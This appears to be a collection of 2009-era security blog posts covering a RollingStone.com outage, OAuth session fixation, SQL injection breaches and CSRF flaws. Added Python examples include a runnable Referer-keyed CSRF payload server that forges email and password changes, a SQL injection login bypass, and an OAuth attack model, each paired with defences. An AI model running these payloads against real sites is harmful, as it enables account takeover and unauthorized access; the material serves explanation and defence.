
When surfing about the tubes I heard from a few people that something was amiss with RollingStone.com. So, I figured I’d wander over and have a look. The screen shot above is the screen cap that I grabbed at 3:08 pm (EST) today. Um, fairly certain that isn’t the standard home page.
So, did they forget to pay the bill? A quick check on the Network Solutions Whois.
Odd, things seem to be in order.

Hmm, a link on the “parked page” redirects to this domain:
Registration Service Provided By: RESELLERCLUB
Contact: +1.4152361970
Website: http://www.resellerclub.com
Domain Name: SEARCHIGNITED.COM
Registrant:
PrivacyProtect.org
Domain Admin (********@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 26-May-2009
Expiration Date: 26-May-2010
Domain servers in listed order:
ns2.cnomy.com
ns1.cnomy.com
OK, so let’s dig into the Network Solutions graphic from the top right hand side of the page.

Nope, that’s not right at all. Things are looking dubious.
Has Rollingstone been hacked?
UPDATE: When I tried to bring up the web page for the listed parent company of RollingStone.com, Wenner Media, I was greeted by this error page.

Thanks to Amber Baldet, one of the folks I mentioned earlier, for her screen cap.
UPDATE 2: I checked the Rolling Stone twitter feed. They confirmed the site outage. No official word as to why, yet.

UPDATE 3: Apparently, the problem is that: “It’s just a technical problem — we’ll be up shortly,” he said. “The domain name has been renewed and is current,” he said. (Thx Axel)
Renewed? Um, according to the domain record it was last updated August 2009 and won’t expire until 2011. I’m calling bullshit on the response from Wenner Media. And how exactly does a “glitch” replace an entire website with one of dubious origin? Not to mention cause it to resolve to the IP address 209.62.20.200 when, until earlier today, rollingstone.com had resolved to either 88.221.94.201 or 88.221.94.248 and had done so since January 15th. I’ve grabbed a copy of the home page for posterity.
Please refrain from urinating on my leg and telling me it’s raining.

Wow. How is this for a REALLY bad idea?
From Vantage Credit Union website:
Introducing tweetMyMoney, available exclusively to Vantage members!
With tweetMyMoney, you can monitor your account balance, deposits, withdrawals, holds and cleared checks with simple commands. And, you can even transfer funds within your account. It’s all available on Twitter, 24/7! And, the best part is, our tweetMyMoney service is free!
So how is this mobile? If your phone can send and receive text messages and you’re on Twitter, you’re in! tweetMyMoney uses Twitter’s Direct Message feature to return the account information you request.
Hell, you can even follow them on Twitter. I wonder if their followers would make for a nice target list. Hmm? As RSnake so aptly put it, “bound to end well :-/”. (HT to RSnake)
So, what could possibly go wrong?
Oops.
What could possibly go wrong?

Weaponizing the Web – Shawn Moyer & Nathan Hamiel
Nathan and Shawn were two of my favorite speakers so far. They are both very smart and awesome guys; buy them beer.
On that note, their talk about weaponizing the web was pretty damn cool to sit in on. For the majority of their talk they reviewed why the social web is such an easily corruptible environment: user-generated content on an increasing number of supremely popular sites is the giant attack surface. User-driven, social, collaborative content, blogs, wikis, and web communities are everywhere you look. Sometimes these things are even being integrated into “old” web media.
Some examples of issues that have popped up in recent times that Nathan and Shawn covered were moot being voted Time’s Person of the Year, post-Michael Jackson celebrity death hoaxes causing “legitimate” news sources to run false stories (RIP Jeff Goldblum), and the New York Times aggregation fail where an article about HTML injection propagated HTML injection.
The emerging socialized web is creating a popular platform for multi-site aggregation which in the attacker’s eyes equals return on investment. Multi-point attack surfaces, APIs, “Digg This!”, etc.
“Malware-like” legitimate functionality is becoming more widely accepted as tolerable, such as silent updates, calling home, and offsite links.
Here is the awesome part: Nathan has released a new tool. He calls it MonkeyFist and it is a PoC dynamic CSRF tool. It includes a small Python web server, creates payloads/patterns based on the referrer, automates per-request “dynamic” CSRF, and constructs hidden POSTs and redirects.
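To make the “dynamic CSRF” idea concrete, here is an added example written for this page; it is not MonkeyFist or any code from Nathan and Shawn. It picks a forged-request pattern from the Referer header, renders the auto-submitting hidden POST that a victim’s browser would fire at the site they came from, and, on the target side, shows the per-session token check that defeats it. The hosts, URLs, form fields and token values are invented for the illustration.

```python
"""Per-request ("dynamic") CSRF payload construction, in the spirit of the
MonkeyFist description above. Added illustration for this page; it is not
Nathan Hamiel's tool. The target hosts, URLs and form fields are invented."""
import hmac
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Hypothetical payload patterns keyed by the Referer host: which site the
# victim arrived from decides which form is replayed against it.
PATTERNS = {
    "social.example": {
        "action": "https://social.example/settings/email",
        "fields": {"email": "attacker@evil.example"},
    },
    "wiki.example": {
        "action": "https://wiki.example/user/password",
        "fields": {"new_password": "hunter2", "confirm": "hunter2"},
    },
}
FALLBACK = "https://example.org/"  # where visitors with no matching pattern go


def choose_pattern(referer, patterns=PATTERNS):
    """Select the pattern for the referring site, or None if there is none."""
    host = urlparse(referer or "").hostname or ""
    return patterns.get(host.lower())


def build_hidden_post(pattern):
    """Render a hidden form that submits itself as soon as the page loads.
    The victim's browser attaches its cookies for pattern['action'], which is
    what makes the forged POST count as the victim's own request."""
    inputs = "".join(
        '<input type="hidden" name="%s" value="%s">' % (html.escape(k), html.escape(v))
        for k, v in pattern["fields"].items()
    )
    return (
        '<form id="f" action="%s" method="POST">%s</form>'
        '<script>document.getElementById("f").submit()</script>'
        % (html.escape(pattern["action"]), inputs)
    )


def handle(referer):
    """Decide one response: (status, body) for a hit, (302, location) otherwise."""
    pattern = choose_pattern(referer)
    if pattern is None:
        return 302, FALLBACK
    return 200, build_hidden_post(pattern)


class PayloadHandler(BaseHTTPRequestHandler):
    """Minimal web server wrapper around handle(); only started under __main__."""

    def do_GET(self):
        status, payload = handle(self.headers.get("Referer"))
        self.send_response(status)
        if status == 302:
            self.send_header("Location", payload)
            self.end_headers()
        else:
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(payload.encode())


# The target side: what defeats the forged POST is a per-session secret that
# the attacker's page cannot read or guess. Constant-time comparison avoids
# leaking the token byte by byte through response timing.
def csrf_token_valid(form, session_token):
    submitted = form.get("csrf_token", "")
    return bool(session_token) and hmac.compare_digest(submitted, session_token)


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), PayloadHandler).serve_forever()
```

Run it and point a browser at it from a page on one of the listed hosts to see the form fire; the Referer is the only input the server needs, which is the whole point of the “dynamic” approach. The target’s `csrf_token_valid` check rejects the forged form because the attacker’s page never had the session token to put in it.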

Wow. Again with the Adobe problems? This zero day broke yesterday and of course being in meetings all day, I missed it. It has been a rather rough year for Adobe products. When will this get better for them and, by extension, all of us?
From CNET:
Researchers on Wednesday said they have uncovered attacks in the wild in which malicious Acrobat PDF files are exploiting a vulnerability in Flash and dropping a Trojan onto computers.
The situation could affect tons of users since Flash exists in all popular browsers, is available in PDF files, and is largely operating system-independent.
Any software that uses Flash could be vulnerable to the attack, according to Symantec.
Here is a link to a PoC of the Adobe Flash exploit. And here is the advisory over on Secunia.

So when dealing with the problem of SSL MITM, which Alex Sotirov and Mike Zusman will be speaking on at Black Hat, Verisign’s marketing felt that securing wireless access points would be the solution.
Arooo?
From The Tech Herald:
“The answer is to lock down these other security deficiencies. We can combat malware through a variety of methods like desktop and edge malware detectors, malware crawls available to site operators, and Extended Validation code signing. We can combat rogue hotspots through authentication initiatives such as the one surrounding the emerging WiMAX standard. WiMAX requires full authentication certificates to be available on all hotspots; in a world where consumers only trusted WiMAX hotspots the attack described here wouldn’t be possible. Those are the new frontiers in ensuring a secure online ecosystem,” Callan added.
Alex was good enough to respond to the article in the comment section as follows.
Tim Callan’s suggestion that to prevent SSL MITM attacks we need to first solve the problem of rogue access points is so ridiculous that I can’t even start to explain all the ways in which it’s wrong.
Sotirov with the three-pointer! Nothing but net.

Billy Hoffman has released some research. This time around he and a fellow researcher have found a way to create a darknet using browsers. Reminds me of a project called Peekabooty which, sadly, is no longer supported.
I’m looking forward to the Black Hat presentation this summer as I’m curious how this differs from the plethora of other options out there.
From Dark Reading:
A pair of researchers has discovered a way to use modern browsers to more easily build darknets — those underground, private Internet communities where users can share content and ideas securely and anonymously.
Billy Hoffman, manager for HP Security Labs at HP Software, and Matt Wood, senior security researcher in HP’s Web Security Research Group, will demonstrate a proof-of-concept for Veiled, a new type of darknet, at the Black Hat USA conference in Las Vegas next month. Darknets, themselves, are nothing new; networks like Tor, FreeNet, and Gnutella are well-established. The HP researchers say Veiled is the same idea, only much simpler: It doesn’t require any software to participate, just an HTML 5-based browser. “We’ve implemented a simple, new darknet in the browser,” Wood says. “There are no supporting [software] programs.”
Except the browsers…
Like I said, I’ll wait until Black Hat.
(Image from Darknetportal Flickr feed CC)

I’m late to the party with this article.
Apparently, there are hackers that are ill disposed to the US. Who knew?
From Information Week:
The hackers, who collectively go by the name “m0sted” and are based in Turkey, penetrated servers at the Army’s McAlester Ammunition Plant in McAlester, Okla., and at the U.S. Army Corps of Engineers’ Transatlantic Center in Winchester, Va.
The breach at the McAlester munitions plant occurred on Jan. 26, according to records of the investigation obtained by InformationWeek. On that date, Web users attempting to access the plant’s site were redirected to a Web page that featured a protest against climate change.
On Sept. 19, 2007, the same hackers electronically broke into Army Corps of Engineers’ servers.
Interesting. I’m used to the “Pwned by $SCRIPTKIDDIE” type of defacement. A redirect to a page on climate change? OK, I’ll admit that’s a new one for me.
More on that story:
Investigators believe the hackers used a technique called SQL injection to exploit a security vulnerability in Microsoft’s SQL Server database to gain entry to the Web servers. “m0sted” is known to have carried out similar attacks on a number of other Web sites in the past — including against a site maintained by Internet security company Kaspersky Lab.
Ah! Now I remember these characters. Maybe the DoD can use some 31337 cops.
Sorry, had to tie that image in somehow.
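As an added example for this page of the class of bug the report names, and not the actual m0sted attack or anything from the Army servers: a login query that splices user input straight into the SQL, next to the parameterized version that closes the hole. It uses SQLite’s in-memory database and a constructed users table so it runs offline; the shape of the bug is the same on SQL Server.

```python
"""Added illustration for this page of the SQL injection pattern named in the
InformationWeek report. The database, table, account and password are
constructed for the example (SQLite, not SQL Server; the real attack details
are not on the page)."""
import sqlite3


def make_db():
    """Constructed sample: a single admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'xJ9!qbn4Lw')")
    return db


def login_vulnerable(db, name, password):
    """Input is spliced into the statement text, so a quote in `name` ends the
    string literal and whatever follows is executed as SQL."""
    query = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, name, password):
    """Bound parameters: the values travel separately from the statement text,
    so a quote in the input is just a character inside a string value."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = db.execute(query, (name, password)).fetchone()
    return row[0] if row else None


# Closes the name literal, then comments out the password test entirely.
INJECTION = "admin'--"


def demo():
    """Run the same injected input through both versions of the login check."""
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, INJECTION, "anything"),
        "safe": login_safe(db, INJECTION, "anything"),
        "legit": login_safe(db, "admin", "xJ9!qbn4Lw"),
    }
```

`demo()` logs in as admin through the vulnerable function without the password, fails through the parameterized one with the same input, and still works for a genuine credential; nothing about the fix depends on filtering the input, only on never letting it become part of the statement.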

There are times when a picture really is worth a thousand words.
Starting off with one of my favourites.
D’oh!

Um, embarrassing, no?
From Heise:
According to an old proverb ‘The cobbler has the worst shoes’. It’s now been reported that Secure, McAfee’s security portal, has had poor shoes or rather poor security, because until recently it displayed a vulnerability to cross-site request forgery (CSRF).
McAfee Secure is a service that lets clients use the Hacker Safe tool to check their sites or online shops for security vulnerabilities and for compliance with the PCI Data Security Standard, which is important for credit-card transactions. If the check shows sites are OK, shop operators can include the McAfee Secure logo in their web site. This is supposed to reassure their customers that their data is well protected and there’s no danger lurking in transactions, such as making payments.
I’m not going to go on about this one. Here is more from others. But I have renewed faith in Nate McFeter’s Certified and Scanless PCI programs.


Ah, open standards. They’re fabulous, aren’t they? Take OAuth for instance. Idealism and interoperability! What’s the gist behind OAuth? Well…
Imagine you’ve got a service that allows you to, say, microblog your life. Then you’ve got another service that allows you to post and share photos on the Internet. You want to make these two services work together — when you upload a new image, the photo sharing service should update the microblogging service to notify your friends about it. Now, maybe the photo sharing service wants your microblog credentials, but you don’t want to give them up. Ah, but it turns out both services support OAuth! So, you tell the photo sharing service about your microblogging service, the microblogging service asks you if you want to grant the photo sharing service access, they exchange some information, and voila: the photo sharing service can notify your friends about your uploads without ever knowing your password!
This concept is so simple, so effective that it makes sense for it to eventually catch on. Sure, OAuth popped up here and there, but what seems to have pushed it into the mainstream was its adoption by Twitter. As a public beta, Twitter recently started supporting OAuth in their service, a well received move. But on the morning of April 22, Twitter unexpectedly pulled the plug on the protocol, as noted by TechCrunch; a comment on the TechCrunch story noted that Yahoo’s OAuth support had been yanked, too. One TechCrunch reader noted that it “sounds like there’s some massive security hole they’re busily patching up.”
It wasn’t but a few hours later when CNET broke the news that the real issue was, indeed, security-related:
A security hole in OAuth, the open-source protocol that acts as a “valet key” for users’ login information, has led services like Twitter and Yahoo to temporarily pull their support, CNET News has learned…. In the interest of online safety, CNET News has chosen not to make the details of the security hole public. Here are the basics: The hole makes it possible for a hacker to use social engineering tactics to trick users into exposing their data.
Twitter even issued an official stance on the whole debacle over at their blog:
This week, we received word from the folks at OAuth that they were looking closely at a security issue within the protocol. We take security seriously and felt the responsible thing to do was temporarily disable OAuth while this matter was sorted out. Yahoo and others made similar decisions.
“Yes, yes, that’s all well and good, you waffle-faced bastard, but what’s the issue?!” Well, it all comes down to a token, of course. Per the OAuth advisory*, released on Thursday, April 23 at 03:00 AM EDT (12:00 AM PDT), there exists a nasty, but obvious-in-the-way-the-spec-is-written-good-deity-how-did-this-get-overlooked, session fixation vulnerability:
The attack starts with the attacker logging into an account he owns at the (honest) Consumer site. The attacker initiates the OAuth authorization process but rather than follow the redirect from the Consumer to obtain authorization, the attacker instead saves the authorization request URI (which includes the Request Token). Later, the attacker convinces a victim to click on a link consisting of the authorization request URI to approve access to the victim’s Protected Resources to the (honest) Consumer.
By clicking on the link, the victim continues the request that the attacker initiated, including the Request Token that the (honest) Consumer issued to the attacker. Note that the victim is redirected to the legitimate approval page at the Service Provider and prompted by the Service Provider to approve the (honest) Consumer. It is not possible for the victim to detect that there is an ongoing attack.
After the victim grants approval, the attacker can use the saved Request Token to complete the authorization flow, and access whatever Protected Resources are exposed by the (honest) Consumer site as part of its service.
XSRF protections at the Consumer site do not mitigate against this attack.
(Update 2009-04-23 06:33) — The OAuth advisory also points to a more detailed analysis of the attack over at Hueniverse. I recommend reading this as well.
As someone who advocates open standards such as OAuth and OpenID, which are oftentimes used as complements to one another, it pains me to see such a nasty flaw rear its head — especially right after it seemed to be getting some traction. A revised OAuth specification is forthcoming that should address this issue.
* – please note that we honoured the timeframe set forth by OAuth by publishing this post only when the official advisory had been released. (And no, we did not discover this flaw. We merely had, uh, accurate discussion and speculation around it.)
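As an added example for this page (not code from the OAuth project, Twitter, or the advisory’s authors), here is a toy Service Provider and Consumer that replays the attack quoted above, then the verifier-based fix that the revised specification adopted, which shipped as the oauth_verifier of OAuth 1.0a. Request signing, nonces and timestamps are left out because they play no part in the attack; the session names, hostnames and token formats are invented.

```python
"""Toy model of the OAuth 1.0 session-fixation attack from the advisory.
Added for this page; not the OAuth project's code. The `use_verifier` switch
models the oauth_verifier mitigation of OAuth 1.0a."""
import secrets


class ServiceProvider:
    def __init__(self, use_verifier):
        self.use_verifier = use_verifier
        self.request_tokens = {}   # request token -> {"approved_by", "verifier"}

    def issue_request_token(self):
        token = secrets.token_hex(8)
        self.request_tokens[token] = {"approved_by": None, "verifier": None}
        return token

    def authorize_url(self, token):
        return "https://sp.example/authorize?oauth_token=" + token

    def user_approves(self, user, token):
        """The user authenticates at the SP and approves the Consumer. With the
        fix, the SP mints a verifier and returns it only to that user's browser
        (in real 1.0a, by redirecting to the Consumer's registered callback)."""
        record = self.request_tokens[token]
        record["approved_by"] = user
        if self.use_verifier:
            record["verifier"] = secrets.token_hex(4)
        return record["verifier"]

    def exchange(self, token, verifier=None):
        """Swap an approved request token for an access token; single use."""
        record = self.request_tokens.pop(token, None)
        if record is None or record["approved_by"] is None:
            raise PermissionError("request token not approved")
        if self.use_verifier and verifier != record["verifier"]:
            raise PermissionError("oauth_verifier mismatch")
        return ("access-token-for", record["approved_by"])


class Consumer:
    def __init__(self, sp):
        self.sp = sp
        self.pending = {}   # consumer session -> request token it started

    def start(self, session):
        token = self.sp.issue_request_token()
        self.pending[session] = token
        return self.sp.authorize_url(token)

    def callback(self, session, verifier=None):
        """Finish the flow for the session that holds the request token."""
        token = self.pending.pop(session)
        return self.sp.exchange(token, verifier)


def run_attack(use_verifier):
    """Return the access token the attacker ends up with, or None."""
    sp = ServiceProvider(use_verifier)
    consumer = Consumer(sp)
    # 1. Attacker starts the flow in his own Consumer session and saves the
    #    authorization URL instead of following it.
    saved_url = consumer.start("attacker-session")
    token = saved_url.split("oauth_token=")[1]
    # 2. Victim is tricked into visiting the saved URL and approves the
    #    (honest) Consumer on the legitimate SP page. Any verifier goes to
    #    the victim's browser, not to the attacker.
    _verifier_sent_to_victim = sp.user_approves("victim", token)
    # 3. Attacker completes the flow from his own session.
    try:
        return consumer.callback("attacker-session")
    except PermissionError:
        return None


def run_honest_flow():
    """Same machinery, no attacker: the verifier round-trips with the user."""
    sp = ServiceProvider(use_verifier=True)
    consumer = Consumer(sp)
    token = consumer.start("alice-session").split("oauth_token=")[1]
    verifier = sp.user_approves("alice", token)
    return consumer.callback("alice-session", verifier)
```

In `run_attack` the victim approves a request token that the attacker’s Consumer session is still waiting on, so without a verifier the attacker’s callback is handed an access token for the victim’s protected resources, exactly as the advisory describes. With the verifier the SP gives the secret only to the browser that approved, so the attacker’s session cannot complete the exchange; in the real 1.0a flow the Consumer also supplies its callback URL when it requests the token, which is what stops the verifier from being redirected elsewhere.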




